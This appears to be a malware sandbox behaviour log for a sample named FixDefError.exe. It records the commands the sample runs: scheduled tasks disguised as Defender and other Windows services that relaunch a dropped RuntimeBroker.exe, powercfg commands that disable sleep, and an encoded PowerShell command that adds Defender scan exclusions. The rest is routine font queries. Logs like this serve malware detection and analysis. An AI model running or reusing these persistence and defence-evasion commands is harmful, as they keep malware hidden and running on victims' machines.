      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Users\user\Desktop\FixDefError.exe VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
